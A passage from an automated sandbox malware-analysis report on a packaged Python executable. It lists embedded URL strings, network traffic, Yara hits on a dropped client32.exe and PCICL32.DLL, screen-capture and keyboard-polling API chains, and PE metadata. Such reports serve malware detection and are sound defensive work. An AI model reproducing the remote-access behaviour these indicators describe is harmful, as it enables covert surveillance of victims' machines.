                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2033757085.0000020E46DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2033757085.0000020E46DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2033757085.0000020E46DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                                Source: BUenB12U2a.exe, 00000001.00000002.2038962432.0000020E47D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
                                Source: BUenB12U2a.exe, 00000001.00000003.2012932665.0000020E47299000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008347211.0000020E47252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exiv2.org/tags.html)
                                Source: powershell.exe, 00000003.00000002.1919245142.000001C99A148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2034663134.0000020E46FF0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                Source: BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011743711.0000020E47844000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E2C000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011090060.0000020E4783C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2037682578.0000020E47846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                                Source: BUenB12U2a.exe, 00000001.00000002.2038962432.0000020E47D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-pillow/Pillow/
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                Source: BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738789207.0000020E4535B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2034663134.0000020E46FF0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                Source: BUenB12U2a.exe, 00000001.00000003.2016384979.0000020E4768A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2037288027.0000020E47765000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009835211.0000020E47756000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751205141.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2022207937.0000020E47762000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1790538475.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015097773.0000020E47682000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E476F6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014768161.0000020E4767B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008522179.0000020E47737000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019182896.0000020E47693000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792680194.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795769765.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012024639.0000020E47760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2034663134.0000020E46FF0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                Source: BUenB12U2a.exe, 00000001.00000002.2036772509.0000020E474F0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746826345.0000020E473C6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749962096.0000020E473C6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038745783.0000020E47AF0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749155705.0000020E473C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/1850
                                Source: BUenB12U2a.exe, 00000001.00000002.2038745783.0000020E47AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/18500
                                Source: BUenB12U2a.exe, 00000001.00000002.2038640444.0000020E479F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/497
                                Source: powershell.exe, 00000003.00000002.1941025395.000001C9B2179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
                                Source: BUenB12U2a.exe, 00000001.00000003.2009164213.0000020E472D7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009311750.0000020E472DC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008219589.0000020E472D6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012721726.0000020E47312000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007926988.0000020E47311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                Source: BUenB12U2a.exe, 00000001.00000003.1795769765.0000020E47763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                                Source: BUenB12U2a.exe, 00000001.00000003.1750148610.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013512531.0000020E472CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1748663176.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746826345.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744363937.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                                Source: BUenB12U2a.exe, 00000001.00000002.2038850666.0000020E47C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                                Source: BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008684232.0000020E4770E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009724569.0000020E47735000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009990846.0000020E472D9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008347211.0000020E47252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                Source: BUenB12U2a.exe, 00000001.00000003.1790538475.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014555113.0000020E4785B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011743711.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751007347.0000020E4783B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795769765.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751205141.0000020E477BF000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792680194.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E47853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2036666930.0000020E473F0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744363937.0000020E47300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                                Source: BUenB12U2a.exe, 00000001.00000002.2043708725.00007FFDFB50B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknown, Network traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknown, Network traffic detected: HTTP traffic on port 49744 -> 443
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe, Code function: 6_2_6CD54F10 _calloc,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,_malloc,_calloc,Sleep,GetTickCount,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetTickCount,WaitForSingleObject,_memset,_memset,_malloc,_malloc,_memset,_calloc,_calloc,GetSystemPaletteEntries,GetStockObject,SelectPalette,SelectPalette,SelectPalette,RealizePalette,_memset,SelectPalette,DeleteObject,CreatePalette,SelectPalette,RealizePalette,BitBlt,GetObjectA,GetBitmapBits,GetDIBits,_malloc,_free,GetTickCount,GetTickCount,WaitForSingleObject,GetTickCount,WaitForSingleObject,GetTickCount,CloseHandle,_free,_free,_free,_free,SelectObject,DeleteObject,DeleteObject,SelectPalette,DeleteObject,DeleteDC,ReleaseDC,_free,_free,_free
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe, Code function: 6_2_6CD44940 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                Source: Yara match, File source: Process Memory Space: BUenB12U2a.exe PID: 6284, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: client32.exe PID: 3452, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: client32.exe PID: 1868, type: MEMORYSTR
                                Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe, Code function: 6_2_6CD46980 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe, Code function: 6_2_6CD46820: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB935FA6_2_6CB935FA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB975C16_2_6CB975C1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC296A76_2_6CC296A7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB996C96_2_6CB996C9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB957956_2_6CB95795
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC1D7546_2_6CC1D754
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBFB7236_2_6CBFB723
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF31BA6_2_6CBF31BA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA911E6_2_6CBA911E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF516D6_2_6CBF516D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC292956_2_6CC29295
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB972106_2_6CB97210
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCACD106_2_6CCACD10
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC6C5F06_2_6CC6C5F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD4C0A06_2_6CD4C0A0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC67B506_2_6CC67B50
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC9B7006_2_6CC9B700
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD8EC806_2_6CD8EC80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD92E456_2_6CD92E45
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD54F106_2_6CD54F10
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC488F06_2_6CC488F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC704B06_2_6CC704B0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD8A4306_2_6CD8A430
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC825D06_2_6CC825D0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Process token adjusted: Security
                                Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-console-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-debug-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-fibers-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-fibers-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-kernel32-legacy-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: python3.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
                                Source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
